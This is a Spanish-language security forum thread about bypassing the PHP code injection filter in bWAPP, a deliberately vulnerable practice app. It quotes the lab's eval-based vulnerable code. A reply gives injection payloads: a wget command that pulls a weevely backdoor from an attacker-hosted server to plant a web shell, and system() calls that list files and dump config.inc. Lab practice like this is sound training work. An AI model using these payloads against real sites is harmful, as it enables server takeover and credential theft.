[SOLUCIONADO] bWAPP PHP code Injection

  • 2 Respuestas
  • 1669 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Olger346

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 1
  • Twitter: @Olger346
    • Ver Perfil

[SOLUCIONADO] bWAPP PHP code Injection

  • en: Noviembre 06, 2017, 01:48:08 pm
Buenas a todos. Hace muuuucho tiempo que no posteo nada.
Hoy decidí practicar nuevamente con la aplicación bwapp de owasp. En el nivel intermedio tenemos algo curioso en la aplicación y es que ahora acepta caracteres especiales que dificultan la ejecición de codigo en funciones como exec, shell_exec, que en el nivel simple se dan muy bien...


Mi duda... ¿Cómo puedo bypasear esta sentencia de código?
Código: You are not allowed to view links. Register or Login
<?php

if(isset($_REQUEST["message"]))
{

    
// If the security level is not MEDIUM or HIGH
    
if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {

?>

    <p><i><?php @eval ("echo " $_REQUEST["message"] . ";");?></i></p>

<?php

    
}

    
// If the security level is MEDIUM or HIGH
    
else
    {
?>

    <p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES"UTF-8");;?></i></p>

<?php

    
}

}

?>

Estuve sviendo algunos videos acerca de esta función y por lo que he comprendido anula las comillas simples y dobles, sin embargo el ampersant && la app cambia su comportamiento, todo lo que va despues del & queda ignorado a la vista del navegador.
« Última modificación: Noviembre 12, 2017, 04:48:06 pm por blackdrake »
"Cuando se nace pobre, estudiar es el mayor acto de rebeldía contra el sistema. El saber rompe las cadenas de la esclavitud" -Tomas Bulat.

Desconectado Mortal_Poison

  • *
  • Underc0der
  • Mensajes: 201
  • Actividad:
    100%
  • Country: 00
  • Reputación 16
  • Become the change you seek in the world. -Gandhi.
  • Twitter: https://www.twitter.com/Mortal_Poison_
    • Ver Perfil
    • XECURE-LABS

Re:bWAPP PHP code Injection

  • en: Noviembre 06, 2017, 02:44:27 pm
Hola You are not allowed to view links. Register or Login

Existen diversas formas, sin embargo, genera un backdoor con weevely y ese backdoor lo subes a una plataforma de almacenamiento.

Si notas, el message lo recibe como parámetro, por tanto, puedes ejecutar lo siguiente con un wget y hacerle una inyección para subirle shell.

Código: PHP
  1. You are not allowed to view links. Register or Login(wget tu_servidor_donde_alojaste_tu_backdoor.com/mortal.txt -O output.php)

Y listo, accederías según veo, a tu dirección 192.168.1.127/bWAPP/shell.php.


Se me olvidó, no revisé lo de htmlspecialchars, al no permitir el shell_exec y filtrar, lo que podemos hacer es: intentar poner por ejemplo: message=cualquiera;system('ls -la');

También podrías intentar message=system(%27cat%20config.inc%27); e irte a ver el código fuente, a ver si lograses ver información útil.



Un saludo.
« Última modificación: Noviembre 06, 2017, 03:01:27 pm por Mortal_Poison »
Become the change you seek in the world. -Gandhi.


Desconectado Olger346

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 1
  • Twitter: @Olger346
    • Ver Perfil

Re:bWAPP PHP code Injection

  • en: Noviembre 07, 2017, 11:01:38 pm
Muchas gracias por tu comentario, intentaré algo extra con la información que me has proporcionado
"Cuando se nace pobre, estudiar es el mayor acto de rebeldía contra el sistema. El saber rompe las cadenas de la esclavitud" -Tomas Bulat.

 

[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 26612
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 11813
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 14071
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 18093
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 9244
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made